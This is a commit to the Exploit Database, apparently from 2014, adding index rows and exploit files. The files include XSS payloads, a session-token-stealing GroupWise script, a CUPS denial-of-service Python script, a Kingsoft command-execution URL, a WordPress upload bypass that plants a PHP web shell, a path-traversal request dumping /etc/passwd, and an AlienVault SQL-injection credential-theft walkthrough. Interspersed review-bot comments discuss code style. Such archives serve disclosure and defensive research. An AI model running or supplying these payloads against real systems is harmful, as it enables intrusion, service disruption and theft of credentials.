Updated 04_26_2014

Offensive Security 2014-04-26 04:35:04 +00:00
parent 01b033c877
commit 7edc578504
24 changed files with 859 additions and 80 deletions


@ -12565,7 +12565,7 @@ id,file,description,date,author,platform,type,port
14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0
14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0
14339,platforms/linux/local/14339.sh,"Ubuntu PAM MOTD Local Root Exploit",2010-07-12,anonymous,linux,local,0
14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0
14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@ -12931,7 +12931,7 @@ id,file,description,date,author,platform,type,port
14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0
14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0
14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0
14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
@ -29742,4 +29742,26 @@ id,file,description,date,author,platform,type,port
32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0
32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0
32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Dursun Ince",php,webapps,0
32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0
33000,platforms/php/webapps/33000.txt,"Cacti <= 0.8.7 'data_input.php' Cross Site Scripting Vulnerability",2009-05-15,fgeek,php,webapps,0
33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability",2009-05-20,inking,php,webapps,0
33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass Vulnerabilities",2009-05-20,EnableSecurity,php,webapps,0
33003,platforms/php/webapps/33003.txt,"Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80
33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php, read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80
33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80
33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443
33007,platforms/multiple/remote/33007.txt,"Novell GroupWise <= 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0
33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-05-22,Securitylab.ir,php,webapps,0
33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 'ErrorPage.aspx' Cross-Site Scripting Vulnerability",2009-05-22,"ben hawkes",asp,webapps,0
33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String Vulnerability",2009-05-26,lofi42,hardware,remote,0
33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0
33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0
33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 'updatecheck.php' Cross Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0
33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0
33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0
33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0
33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0
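Review bot: The new 33001 row (`33001,platforms/php/webapps/33001.ssh,...`) is the only entry in this batch whose advisory file carries a `.ssh` extension; every other text advisory added in the same hunk is `.txt`. The committed file at platforms/php/webapps/33001.ssh uses the same name, so index and tree agree, but the extension reads like a typo and will mislead readers and tooling that infer content type from it — if `.txt` was intended, rename the file and the row together so files.csv stays consistent. The same row classifies the Kingsoft Webshield advisory as `php,webapps` although the advisory text describes a feature of a desktop security suite; the platform field may be worth a second look.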


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35074/info
DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects versions prior to DotNetNuke 4.9.4.
http://www.example.com/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http://www.example.net/XSS.html%22%3


@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35093/info
SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed attempts may cause denial-of-service conditions.
Global VPN Client 4.0.0.2-51e Standard and Enhanced are vulnerable; other versions may also be affected.
The following proofs of concept are available:
1. CFS: Add example.com to your "Forbidden Domains" and access http://www.example.com/%s%s%s%s%s%s/.
2. GroupVPN: Establish a GroupVPN Tunnel and enter at the XAUTH Username %s%s%s%s%s.
3. Webfrontend: Enter at the Login Page of your SonicWALL as Username %s%s%s%s%s


@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35145/info
Multiple SonicWALL SSL-VPN devices are prone to a remote format-string vulnerability because they fail to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Attackers may exploit this issue to run arbitrary code in the context of the affected application. Failed attempts may cause denial-of-service conditions.
The following are vulnerable:
SSL-VPN 200 firmware prior to 3.0.0.9
SSL-VPN 2000 firmware prior to 3.5.0.5
SSL-VPN 4000 firmware prior to 3.5.0.5
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n

platforms/linux/dos/33015.c Executable file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/35143/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an affected process to hang, denying service to legitimate users. Other denial-of-service attacks are also possible.
This issue was introduced in Linux Kernel 2.6.19. The following versions have been fixed:
Linux Kernel 2.6.30-rc3
Linux Kernel 2.6.27.24
Linux Kernel 2.6.29.4
pipe(pfds);
snprintf(buf, sizeof(buf), "/tmp/%d", getpid());
fd = open(buf, O_RDWR | O_CREAT, S_IRWXU);
if (fork()) {
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
} else{
sleep(1);
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
}
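Review bot: The C from `pipe(pfds);` to the closing brace is a bare fragment — no `#include`s, no declarations for `pfds`, `buf` or `fd`, and no enclosing function — and the advisory lines above it are not C comments, so the file does not compile as committed. If the intent is an archival transcript of the BID entry rather than a buildable program, a leading comment such as `/* Transcribed from http://www.securityfocus.com/bid/35143/info -- fragment, not a complete program */` makes that explicit for readers and for tooling that scans `.c` files.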

platforms/linux/dos/33020.py Executable file

@ -0,0 +1,91 @@
source: http://www.securityfocus.com/bid/35169/info
CUPS is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when processing two consecutive IPP_TAG_UNSUPPORTED tags in specially crafted IPP (Internet Printing Protocal) packets.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
from struct import pack
import sys
import socket
class IppRequest:
"""
Little class to implement a basic Internet Printing Protocol
"""
def __init__(self, host, port, printers, hpgl_data="a"):
self.printers = printers
self.host = host
self.port = port
self.hpgl_data = hpgl_data
self.get_ipp_request()
def attribute(self, tag, name, value):
data = pack('>B',tag)
data += pack('>H',len(name))
data += name
data += pack('>H',len(value))
data += value
return data
def get_http_request(self):
http_request = "POST /printers/%s HTTP/1.1\r\n" % self.printers
http_request += "Content-Type: application/ipp\r\n"
http_request += "User-Agent: Internet Print Provider\r\n"
http_request += "Host: %s\r\n" % self.host
http_request += "Content-Length: %d\r\n" % len(self.ipp_data)
http_request += "Connection: Keep-Alive\r\n"
http_request += "Cache-Control: no-cache\r\n"
return http_request
def get_ipp_request(self):
operation_attr = self.attribute(0x47, 'attributes-charset', 'utf-8')
operation_attr += self.attribute(0x48, 'attributes-natural-language', 'en-us')
operation_attr += self.attribute(0x45, 'printer-uri', "http://%s:%s/printers/%s" % (self.host, self.port, self.printers))
operation_attr += self.attribute(0x42, 'job-name', 'foo barrrrrrrr')
operation_attr += self.attribute(0x42, 'document-format', 'application/vnd.hp-HPGL')
self.ipp_data = "\x01\x00" # version-number: 1.0
self.ipp_data += "\x00\x02" # operation-id: Print-job
self.ipp_data += "\x00\x00\x00\x01" # request-id: 1
self.ipp_data += "\x01" # operation-attributes-tag
self.ipp_data += "\x0f\x0f"
# self.ipp_data += operation_attr
self.ipp_data += "\x02" # job-attributes-tag
self.ipp_data += "\x03" # end-of-attributes-tag
self.ipp_data += self.hpgl_data;
return self.ipp_data
def main():
try:
printer = sys.argv[1]
host = sys.argv[2]
except:
print "[+] Usage: exploit printer_name host"
return 0
data = "A"*100
ipp = IppRequest(host,"80", printer, data)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to the host"
s.connect((host, 631))
#requests = ipp.get_http_request()
#for each in requests:
# s.send(each)
print "[+] Sending request"
s.send(ipp.get_http_request())
s.send("\r\n")
print "[+] Sending ipp data"
s.send(ipp.get_ipp_request())
print "Response:%s" % s.recv(1024)
print "done!"
if __name__ == "__main__":
sys.exit(main())
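Review bot: In `main()` the bare `except:` around the two `sys.argv` reads catches every exception, not just the missing-argument case, so any unrelated failure in that block is reported as a usage error; `except IndexError:` states what is actually being handled. `get_ipp_request()` both stores the payload on `self.ipp_data` and returns it, and is called once from `__init__` and again from `main()`, so the buffer is built twice; a one-line docstring on it and on `attribute()` (`"""Encode one IPP attribute as tag, name-length, name, value-length, value."""`) would make that dual role clear. As rendered here the advisory header lines above the imports are not comments and the class/method indentation has been flattened, so the listing reads as a transcript rather than a runnable module.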


@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/35066/info
Novell GroupWise WebAccess is prone to multiple security vulnerabilities.
An attacker may leverage these issues to bypass certain security restrictions or conduct cross-site scripting attacks.
Note that some of the issues may be related to BID 35061. We will update this BID as more information emerges.
Versions prior to WebAccess 7.03 HP3 and 8.0.0 HP2 are vulnerable.
Following harmless code uses an onload() event handler to bootstrap its payload as soon as the email
is open.
The first stage of this script extracts the session token (User.Context) from within the current
document&#039;s URI and used
to make up the second stage.
The second injects an iframe in the current page which in turn calls the signature configuration
interface and changes the user&#039;s signature on the fly.
This example uses a fake target, &#039;gwwa.victim.com&#039; that must be changed with a real server
addresss/name.
Here, the security parser won&#039;t recognize "onload = &#039;javascript:..." as potentially unsafe just
because of the space characters.
<!--
<html>
<head>
</head>
<body onmouseover = &#039;return false;&#039; onload = &#039;javascript:var
context=document.location.href;var token=context.replace(/^.+context=([a-z0-9]+).+$/i,"$1");
var
malwareS1="%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%62%72%2F%3E%3C%62%72%2F%3E%4E%6F%77%20%63%68%65%63%6B%20%79%6F%75%72%20%73%69%67%6E%61%74%75%72%65%20%2E%2E%2E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%77%77%61%2E%76%69%63%74%69%6D%2E%63%6F%6D%2F%67%77%2F%77%65%62%61%63%63%3F%55%73%65%72%2E%63%6F%6E%74%65%78%74%3D";
var
malwareS2="%26%61%63%74%69%6F%6E%3D%53%69%67%6E%61%74%75%72%65%2E%4D%6F%64%69%66%79%26%6D%65%72%67%65%3D%73%69%67%6E%61%74%75%72%26%53%69%67%6E%61%74%75%72%65%2E%69%73%45%6E%61%62%6C%65%64%3D%65%6E%61%62%6C%65%64%26%53%69%67%6E%61%74%75%72%65%2E%69%73%41%75%74%6F%6D%61%74%69%63%3D%61%75%74%6F%6D%61%74%69%63%26%53%69%67%6E%61%74%75%72%65%2E%73%69%67%6E%61%74%75%72%65%3D%25%32%30%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%25%30%64%25%30%61%25%30%64%25%30%61%30%77%6E%65%64%2E%22%20%77%69%64%74%68%3D%30%70%78%20%68%65%69%67%68%74%3D%30%70%78%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E";
document.write(unescape(malwareS1)+token+unescape(malwareS2));return false;&#039;>
<br/>
<br/><br/>Now check your signature ...
</body>
</html>
-->


@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/35196/info
Apache Tomcat is prone to a username-enumeration weakness because it displays different responses to login attempts, depending on whether or not the username exists.
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
The following are vulnerable:
Tomcat 4.1.x (prior to 4.1.40)
Tomcat 5.5x (prior to 5.5.28)
Tomcat 6.0.x (prior to 6.0.20)
The following example POST data is available:
POST /j_security_check HTTP/1.1
Host: www.example.com
j_username=tomcat&j_password=%


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34991/info
Cacti is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to Cacti 0.8.7b are vulnerable.
http://www.example.com/cacti/data_input.php?action="><SCRIPT>alert("XSS")</SCRIPT>

platforms/php/webapps/33001.ssh Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/35038/info
The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.
Remote attackers may exploit this vulnerability to compromise an affected computer.
This issue affects WebShield 1.1.0.62 and prior versions.
http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e

platforms/php/webapps/33002.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35053/info
Profense Web Application Firewall is prone to multiple security-bypass vulnerabilities.
An attacker can exploit these issues to bypass certain security restrictions and perform various web-application attacks.
Versions *prior to* the following are vulnerable:
Profense 2.4.4
Profense 2.2.22
http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

platforms/php/webapps/33003.txt Executable file

@ -0,0 +1,55 @@
# Author: nopesled
# Date: 24/04/14
# Software: https://wordpress.org/plugins/work-the-flow-file-upload/
# Company: http://wtf-fu.com/
# Version: 1.2.1
# Tested on: Windows 7
# Vulnerability: Unrestricted File Upload
Submit an image file via the wtf upload panel and intercept the POST request to /wp-admin/admin-ajax.php
By editing the data from the control 'accept_file_types', we can upload normally disallowed filetypes such as PHP.
Append '|php':
- ----------------------------123456789123456\r\n
Content-Disposition: form-data; name="accept_file_types"\r\n
\r\n
jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n
Now change the extension in the data for 'filename' to '.php' and enter your desired code like so
- ----------------------------123456789123456\r\n
Content-Disposition: form-data; name="files[]"; filename="illegal.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\n
system($_GET[\'cmd\']);\n
?>\n
- ----------------------------123456789123456--\r\n
Submit this POST request and you will find your file in the directory:
/wp-content/uploads/public/wtf-fu_files/default/
It's not required to set the control 'deny_public_uploads' to true, because it still gets uploaded anyway regardless if it's enabled or not.
###################################
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Signed.
-----BEGIN PGP SIGNATURE-----
Version: Keybase OpenPGP v0.1.11
Comment: https://keybase.io/crypto
wsBcBAABCgAGBQJTWQpLAAoJEOB0UMODnV4U7QIIAIKXDQVK8fIXY0BSO4ZrHq8L
2a51JCVmpwBzrHVp87FCpYHcMXyuCXWi5joEbiJFVi5ojHTSii5ZwvBVJwvyoKcy
jexj2IvMoC30zrgSdTu9/lMd1tYGYQCSlMubFvzE0edmDCo7fH2gF8Zvfw4Lj4ng
KJOpB9HsvDUJVNlbDMl+MbGAW32m6BqG4ttdjE1bs1suDxb/JrS7okuHu1Qmpe0+
Xp50x4wUVrZSeqT5VnWDWjox2BnSGEcAKbkjFeRDBpgJyeWJGH20jXb6m4sYNLDT
gf9ml9oM5yncivMN2dJU+hp3Xyfp6rEute9jA+lcEMwZsyjlwAVFhszV4qh7X+o=
=5nDI
-----END PGP SIGNATURE-----
###################################

platforms/php/webapps/33004.txt Executable file

@ -0,0 +1,47 @@
Vulnerability title: Arbitrary file read in dompdf
CVE: CVE-2014-2383
Vendor: dompdf
Product: dompdf
Affected version: v0.6.0
Fixed version: v0.6.1 (partial fix)
Reported by: Alejo Murillo Moyas
Details:
An arbitrary file read vulnerability is present on dompdf.php file that
allows remote or local attackers to read local files using a special
crafted argument. This vulnerability requires the configuration flag
DOMPDF_ENABLE_PHP to be enabled (which is disabled by default).
Using PHP protocol and wrappers it is possible to bypass the dompdf's
"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing
system files or other files on the webserver. Please note that the flag
DOMPDF_ENABLE_REMOTE needs to be enabled.
Command line interface:
php dompdf.php
php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>
Web interface:
http://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

platforms/php/webapps/33005.txt Executable file

@ -0,0 +1,171 @@
SEC Consult Vulnerability Lab Security Advisory < 20140423-0 >
=======================================================================
title: Path Traversal/Remote Code Execution
product: WD Arkeia Virtual Appliance (AVA)
vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3.
fixed version: 10.2.9
CVE number: CVE-2014-2846
impact: critical
homepage: http://www.arkeia.com/
found: 2014-03-05
by: M. Lucinskij
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and
affordable data protection for enterprises seeking to optimize the benefits of
virtualization. The AVA offers all the features of the hardware appliance, but
permits you to use your own choice of hardware."
source:
http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance
Business recommendation:
------------------------
The identified path traversal vulnerability can be exploited by unauthenticated
remote attackers to gain unauthorized access to the WD Arkeia virtual appliance
and stored backup data.
SEC Consult recommends to restrict access to the web interface of the WD Arkeia
virtual appliance using a firewall until a comprehensive security
audit based on a security source code review has been performed and all
identified security deficiencies have been resolved by the affected vendor.
Vulnerability overview/description:
-----------------------------------
The WD Arkeia virtual appliance is affected by a path traversal vulnerability.
Path traversal enables attackers access to files and directories outside the
web root through relative file paths in the user input.
An unauthenticated remote attacker can exploit the identified vulnerability in
order to retrieve arbitrary files from the affected system and execute system
commands.
Proof of concept:
-----------------
The path traversal vulnerability exists in the
/opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie
is not properly checked before including a file using the PHP include()
function. Example of the request that demonstrates the vulnerability by
retrieving the contents of the /etc/passwd file:
POST /login/doLogin HTTP/1.0
Host: $host
Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
password=bbb&username=aaa
The response from the affected application:
HTTP/1.1 200 OK
Date: Wed, 05 Mar 2014 08:29:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Charset: UTF-8
Content-Length: 1217
Connection: close
Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
{"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or
login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n
ull]}}
Furthermore, the identified vulnerability can be also exploited to
execute arbitrary PHP code/system commands by including files that
contain specially crafted user input.
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the 10.2.7 version of the WD
Arkeia virtual appliance.
According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since
7.0.3 are affected.
Vendor contact timeline:
------------------------
2014-03-13: Contacting vendor through support@arkeia.com
2014-03-14: Vendor confirms the vulnerability.
2014-03-17: Vendor provides a quick fix and a release schedule.
2014-04-21: Vendor releases a fixed version
2014-04-23: SEC Consult releases a coordinated security advisory.
Solution:
---------
Update to the most recent version (10.2.9) of Arkeia Network Backup.
More information can be found at:
http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution
Workaround:
-----------
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF M. Lucinskij / @2014

platforms/php/webapps/33006.txt Executable file

@ -0,0 +1,73 @@
AlienVault 4.3.1 Unauthenticated SQL Injection
Vulnerability Type: SQL Injection
Reporter: Sasha Zivojinovic
Company: Gotham Digital Science
Affected Software: AlienVault 4.3.1
Severity: Critical
===========================================================
Summary
===========================================================
A number of SQL injection vectors were identified within AlienVault (AV) 4.3.1 components. The “Geolocation Graph” and “Radar Access Control” AV components were found to accept HTTP request parameters that are concatenated without filtering or validation. These parameters are then passed as SQL queries which exposes the application to SQL Injection. This issue can be exploited by any unauthenticated users who have access to the AV web application. In addition the effective MySQL user was found to be “root” which allows attackers to leverage the identified issues into attacks against the AV host system.
===========================================================
Technical Details
===========================================================
The date_from and date_to parameters passed to the graph_geoloc.php page, the date_from and date_to parameters passed to the radar-iso27001-A11AccessControl-pot.php page and the “user” parameter passed to the “graph_geoloc2.php” page are vulnerable to SQL injection attacks. These parameters were found to evaluate any SQL statements passed to them via a HTTP GET request.
PHP functions “whereYM” and “getSourceLocalSSIYear” in source file “/var/www/geoloc/include/data_functions.inc” do not filter or validate user supplied input when constructing dynamic SQL queries. Attackers can inject arbitrary SQL statements that will be evaluated on the underlying MySQL server.
Due to time limitations it has not been possible to locate the causes of the other identified vectors.
Extending the attack:
An attacker can retrieve various AV credentials including the MySQL connection string by querying the “alienvault.config” database table or by querying the “/etc/ossim/idm/config.xml” file through MySQL file access methods such as “LOAD_FILE”. Almost all credentials used by AV are equivalent so retrieving the credentials for the nessus user will also reveal the credentials for the SQL server and other components. These credentials are stored in plain-text within the database. By querying the “alienvault.users” table the attacker can retrieve the unsalted MD5 password hashes for administrative users. These hashed credentials are equivalent to the SSH credentials for the same users. Once these credentials have been retrieved and cracked an attacker can bypass the restrictions present in the SQL injection vector and perform arbitrary system or SQL queries by connecting directly to the AV host via SSH and using the local MySQL client to connect to the MySQL server.
Cross Site Scripting (XSS):
In addition the presence of MySQL errors presents an opportunity for reflected XSS attacks as the MySQL server does not filter responses when returning errors to the application user.
===========================================================
Proof-of-Concept Exploit
===========================================================
